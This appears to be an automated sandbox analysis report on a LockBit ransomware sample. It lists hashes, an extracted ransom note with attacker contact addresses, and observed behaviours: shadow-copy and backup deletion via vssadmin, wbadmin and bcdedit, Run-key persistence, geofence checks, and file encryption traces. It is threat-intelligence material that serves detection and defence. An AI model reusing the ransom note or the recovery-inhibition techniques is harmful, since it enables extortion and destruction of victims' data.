lockbit | b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893

Analysis

max time kernel
136s
max time network
177s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
24-08-2022 19:26

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe
Size

81KB
MD5

3ee21dbaa37d0048e2e174cb41a664d6
SHA1

f7799dc7530c3234dd2d5c11b74361b7ec1daefb
SHA256

b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893
SHA512

7cfcc286522cc1d70f4f0d83e8a6e9ed27a7b94ead3f272a271ce1bf6708c91b0f19ddbf7cdebe44239c903142bd8f9b1949d17cbce0dd39e9491acb9744e947
SSDEEP

1536:+uBQrT1eLBBdU/1GJj4UgvpedwwtVNUmrTF3MqqU+hV2xQie:+uBUwX0C4Vvs2wT+mr5MqqD/Fi

Score

10^/10

lockbit evasion persistence ransomware

Malware Config

Extracted

Path

C:\Restore-My-Files.txt

Family

lockbit

Ransom Note

All your important files are encrypted! There is only one way to get your files back: 1. Contact with us 2. Send us 1 any encrypted your file and your personal key 3. We will decrypt 1 file for test(maximum file size - 1 MB), its guarantee what we can decrypt your files 4. Pay 5. We send for you decryptor software We accept Bitcoin Attention! Do not rename encrypted files. Do not try to decrypt using third party software, it may cause permanent data loss. Decryption of your files with the help of third parties may cause increased price(they add their fee to our) Contact information: [email protected] Be sure to duplicate your message on the e-mail: [email protected] Your personal id: �Ce3YhOSP5hi9+rvHRQsPtxQLRUGct4JkOcveF1oDOdLSITpa5PGT3Vjdwg4Pvy9q OH2BC4us0FOnh+DFu5R1R52r0OEHXmGZcVpwd2UJdyknB0yYi+jq/qC9q3LZrd14 9PEq6VG9DYEYaUABGXXFgS5fWCT+MP5dZF8rLwx3TVLg0EgMJFd7IlM3Hqz53boc Zb++f9/b1Blgd/3kwfTYflfpWuZ9wFGVGMlSz+FsArQzfdfrN7uSjniTjW3ttKFD LU6QcKVTo9OLlWMc+ZQNojZjUgz11tXWlIhc9xU/QMuo8FLKf/9MrSMaCFngWKjR 6tsttlhHHzeMouNDCoY0QoTbDjxVrle1+U73RGu50sqs7ea26+UGsqG2++ABXlwQ ocrFC9O9p6zTs3d2PKaxsIhfR/UIs8Ap7+AhjzK8lnxVcIhb3Snx8lDDN+EJQOJ7 Ts9hiLhhsif8gyyBsaBlctC+JT6HVsJ06SW4GGutz6UPtBp5n9Dr7XW/dmdNXFYR heO/SlZw6rg/NlPXO7fYPys7js1rk4SSivWXb86OFzzR/wXYH6QVm7h9ZnPAZT9Y RmhZMn1RFPVVAQ45NSaJantEn6X+oA3hDwnW8OXbRL6qnAP48MsjHizJC8iWtzvu QK88YnRKrilFe+yf67IgtzCfLx04TGlglR88myy7WuANedt0odh9yFhKt0FCEWru dO2sQlfLAcyu9fXSLdS1I6eH8K33bMKK/EmoRlK7WYsq5U3VDV28hOa7X+tivkxy NJdBbMbgR1eB+xsCHfUYTnPZvXW1fqJIR4VD6/fUjFmynPXltlYlVDCIdqr5jZeR RH8QtWLx+9fh5Q66cCI0MZqeyfFtA3AfjN/MoV8zK+OCI3LPbFImcgB/JhKCJ51v +KOHZO/8Lk0qElOvXD2t/MFJYzBK/x1GqrSg06z5Er8mOLzZQvUyYXrLmpNBmvMy wHAPLLw7jevdSofk04i8DzPD2VVsD7OxZIMPzTggJRbsNurACJaGLb1IR56Krq3m GAAUd9dlTNA/QBz9Kyk6eTU84bw7NlGfIoAt5PpRWw0SMQ3ZZqdmDIXXZwn4Pq9D uVrZchX2aELQSQ7Wf19qV+7CXwxbv3Fp3SuqJfIc0ssIat/MeH2kQP7mxZmONSps 7vEZIp5jRihICyBfx05VbM3sebY4CIrLUNRXW+kYFXZUTZRkJN7uJ0BdWekejuQH DDfGHvv56NhkAxRAmA8eeBPWjsMzj6ujyw2NbQV8fIicR3YB9UsZqo7XqARgM1K9 46iesR7CAcHGkGdteDi59i193Nz7WfN4zz36vIOPPjjlecxz0JbcM4iubbkjkOqI Phy+fRaRWkybY4jUS3TIfQ+pDZrgvUgIjVKvw+k6o4VSL0DXuKmQOeiYJb5flp8N Sd5gK9p+qGJ1GJsgnrKxYGn1SfHyIy+GkgrnrocLkIdbScJDHyJKYU0NO3ndzuj3 V8pqUhwgpnut5iaLAamI5kAXtE86m4Br9A0UuU77b/X7zbmJq0H6tzwdMQAQf7Xw XMhKJAjsT7o/nwIqHR/LgzwkQNoAG4o9P4kf2oPIZpYB2jNftxJV4ZzOO6qEG5jT /7BU4KgZPcBEqM+fvONuyapNjpQFi2s3wqY5B2TRFwX5BbNt/iiddn/bYByIk41s WlCaBVsFzcpIrI0yedHM6wW+jLEIFNvO2oXjStYb9Oo=

Emails

[email protected]

Signatures

Lockbit
Ransomware family with multiple variants released since late 2019.
ransomware lockbit
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Modifies boot configuration data using bcdedit 1 TTPs 8 IoCs
ransomware evasion

Inhibit System Recovery
T1490

Processes:

bcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exe

pid process

2336 bcdedit.exe
4908 bcdedit.exe
3968 bcdedit.exe
616 bcdedit.exe
5080 bcdedit.exe
4044 bcdedit.exe
4136 bcdedit.exe
3904 bcdedit.exe
Deletes System State backups 3 TTPs 6 IoCs
Uses wbadmin.exe to inhibit system recovery.
ransomware

Command-Line Interface
T1059

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

wbadmin.exewbadmin.exewbadmin.exewbadmin.exewbadmin.exewbadmin.exe

pid process

4260 wbadmin.exe
1416 wbadmin.exe
4856 wbadmin.exe
1512 wbadmin.exe
3960 wbadmin.exe
3504 wbadmin.exe
Deletes backup catalog 3 TTPs 1 IoCs
Uses wbadmin.exe to inhibit system recovery.
ransomware

Command-Line Interface
T1059

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

wbadmin.exe

pid process

272 wbadmin.exe

pid	process
2336	bcdedit.exe
4908	bcdedit.exe
3968	bcdedit.exe
616	bcdedit.exe
5080	bcdedit.exe
4044	bcdedit.exe
4136	bcdedit.exe
3904	bcdedit.exe

pid	process
4260	wbadmin.exe
1416	wbadmin.exe
4856	wbadmin.exe
1512	wbadmin.exe
3960	wbadmin.exe
3504	wbadmin.exe

pid	process
272	wbadmin.exe

Modifies extensions of user files 3 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe

description	ioc	process
File renamed	C:\Users\Admin\Pictures\DisconnectCopy.raw => C:\Users\Admin\Pictures\DisconnectCopy.raw.abcd	b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe
File renamed	C:\Users\Admin\Pictures\FormatRequest.tif => C:\Users\Admin\Pictures\FormatRequest.tif.abcd	b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe
File renamed	C:\Users\Admin\Pictures\StartConnect.png => C:\Users\Admin\Pictures\StartConnect.png.abcd	b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\XO1XADpO01 = "\"C\""	b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe

Drops file in Program Files directory 64 IoCs

Processes:

b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe

description	ioc	process
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Getstarted_8.2.22942.0_x64__8wekyb3d8bbwe\Assets\GetStartedAppList.targetsize-256_altform-unplated_contrast-black.png	b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.1903.1152.0_x64__8wekyb3d8bbwe\images\FilePdf32x32.png	b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxCalendarAppList.targetsize-48.png	b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\StoreRatingPromotion.winmd	b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppPackageAppList.scale-125_contrast-white.png	b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxA-Yahoo-Light.scale-100.png	b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_filter-down_32.svg	b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.22681.0_x64__8wekyb3d8bbwe\Assets\AppList.scale-200.png	b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\Restore-My-Files.txt	b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\SearchEmail2x.png	b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.metadata.nl_ja_4.4.0.v20140623020002.jar	b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProjectPro2019VL_MAK_AE-ul-oob.xrm-ms	b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\bn_IN\LC_MESSAGES\vlc.mo	b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Assets\Square44x44Logo.targetsize-256.png	b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_sendforsignature_18.svg	b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\be_get.svg	b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ms.txt	b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNotePageSmallTile.scale-400.png	b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1906.2182.0_x64__8wekyb3d8bbwe\Assets\AlarmsAppList.contrast-black_targetsize-256.png	b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxMailAppList.targetsize-48_altform-unplated.png	b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\es-es\ui-strings.js	b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\fi-fi\Restore-My-Files.txt	b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.mbeanbrowser.ja_5.5.0.165303.jar	b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\ReactAssets\assets\RNApp\app\uwp\images\onboarding\landing_page_share_profile_v1.png	b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\en-gb\outlook_whatsnew.xml	b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\LinkedInboxBadge.scale-400.png	b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\O365SmallBusPremR_SubTrial4-ppd.xrm-ms	b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1906.2182.0_x64__8wekyb3d8bbwe\Assets\AlarmsAppList.contrast-black_targetsize-16_altform-unplated.png	b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.contrast-white_targetsize-80.png	b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe
File opened for modification	C:\Program Files (x86)\Windows Photo Viewer\fr-FR\ImagingDevices.exe.mui	b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\AUTHORS.txt	b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\EmptySearch-Dark.scale-400.png	b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\de-de\ui-strings.js	b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\ru-ru\ui-strings.js	b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.1903.1152.0_x64__8wekyb3d8bbwe\images\AppPowerPoint32x32.png	b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files-select\js\Restore-My-Files.txt	b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\nb-no\ui-strings.js	b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1907.3152.0_x64__8wekyb3d8bbwe\Assets\InsiderHubLargeTile.scale-200.png	b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\config\Modules\org-netbeans-core-output2.xml_hidden	b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdVL_MAK-ppd.xrm-ms	b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe
File created	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\BREEZE\Restore-My-Files.txt	b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1906.2182.0_x64__8wekyb3d8bbwe\Assets\AlarmsAppList.targetsize-64_altform-lightunplated.png	b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\license.html	b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Place\contrast-white\SmallTile.scale-125.png	b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1906.2182.0_x64__8wekyb3d8bbwe\Assets\AlarmsAppList.targetsize-48_altform-lightunplated.png	b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Assets\Square44x44Logo.targetsize-96.png	b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WebpImageExtension_1.0.22753.0_x64__8wekyb3d8bbwe\Assets\StoreLogo.scale-400.png	b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\download-btn.png	b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\TrafficHub\contrast-white\SmallTile.scale-200.png	b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe
File opened for modification	C:\Program Files\Common Files\System\Ole DB\sqlxmlx.rll	b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\O365SmallBusPremR_SubTrial3-pl.xrm-ms	b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\LargeTile.scale-200.png	b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\Images\PrintAndShare\Glyph_0xe81b.png	b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\fr-fr\ui-strings.js	b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Home\contrast-black\LargeTile.scale-125.png	b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ScreenSketch_10.1907.2471.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\ScreenSketchStoreLogo.scale-125_contrast-white.png	b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsSoundRecorder_10.1906.1972.0_x64__8wekyb3d8bbwe\Assets\VoiceRecorderSmallTile.contrast-black_scale-100.png	b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppList.targetsize-96_contrast-black.png	b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxCalendarAppList.targetsize-96.png	b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe
File opened for modification	C:\Program Files\Java\jre1.8.0_66\lib\ext\sunpkcs11.jar	b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AppTiles\contrast-black\Weather_LogoSmall.scale-100.png	b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.People_10.1902.633.0_x64__8wekyb3d8bbwe\Assets\contrast-white\PeopleSplashScreen.scale-200.png	b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WebpImageExtension_1.0.22753.0_x64__8wekyb3d8bbwe\Assets\contrast-white\SmallTile.scale-100_contrast-white.png	b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\zh-cn\ui-strings.js	b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe

Drops file in Windows directory 3 IoCs

Processes:

wbadmin.exe

description	ioc	process
File opened for modification	C:\Windows\Logs\WindowsBackup\WBEngine.2.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\WBEngine.1.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\WBEngine.3.etl	wbadmin.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 4 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

vds.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000	vds.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	vds.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000	vds.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName	vds.exe

Interacts with shadow copies 2 TTPs 4 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

vssadmin.exevssadmin.exevssadmin.exevssadmin.exe

pid process

5040 vssadmin.exe
3556 vssadmin.exe
4136 vssadmin.exe
280 vssadmin.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

4644 PING.EXE

pid	process
5040	vssadmin.exe
3556	vssadmin.exe
4136	vssadmin.exe
280	vssadmin.exe

pid	process
4644	PING.EXE

Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe

pid	process
524	b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe
524	b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exevssvc.exeWMIC.exewbengine.exewmic.exe

description	pid	process
Token: SeIncBasePriorityPrivilege	524	b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe
Token: SeDebugPrivilege	524	b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe
Token: SeBackupPrivilege	2576	vssvc.exe
Token: SeRestorePrivilege	2576	vssvc.exe
Token: SeAuditPrivilege	2576	vssvc.exe
Token: SeIncreaseQuotaPrivilege	5080	WMIC.exe
Token: SeSecurityPrivilege	5080	WMIC.exe
Token: SeTakeOwnershipPrivilege	5080	WMIC.exe
Token: SeLoadDriverPrivilege	5080	WMIC.exe
Token: SeSystemProfilePrivilege	5080	WMIC.exe
Token: SeSystemtimePrivilege	5080	WMIC.exe
Token: SeProfSingleProcessPrivilege	5080	WMIC.exe
Token: SeIncBasePriorityPrivilege	5080	WMIC.exe
Token: SeCreatePagefilePrivilege	5080	WMIC.exe
Token: SeBackupPrivilege	5080	WMIC.exe
Token: SeRestorePrivilege	5080	WMIC.exe
Token: SeShutdownPrivilege	5080	WMIC.exe
Token: SeDebugPrivilege	5080	WMIC.exe
Token: SeSystemEnvironmentPrivilege	5080	WMIC.exe
Token: SeRemoteShutdownPrivilege	5080	WMIC.exe
Token: SeUndockPrivilege	5080	WMIC.exe
Token: SeManageVolumePrivilege	5080	WMIC.exe
Token: 33	5080	WMIC.exe
Token: 34	5080	WMIC.exe
Token: 35	5080	WMIC.exe
Token: 36	5080	WMIC.exe
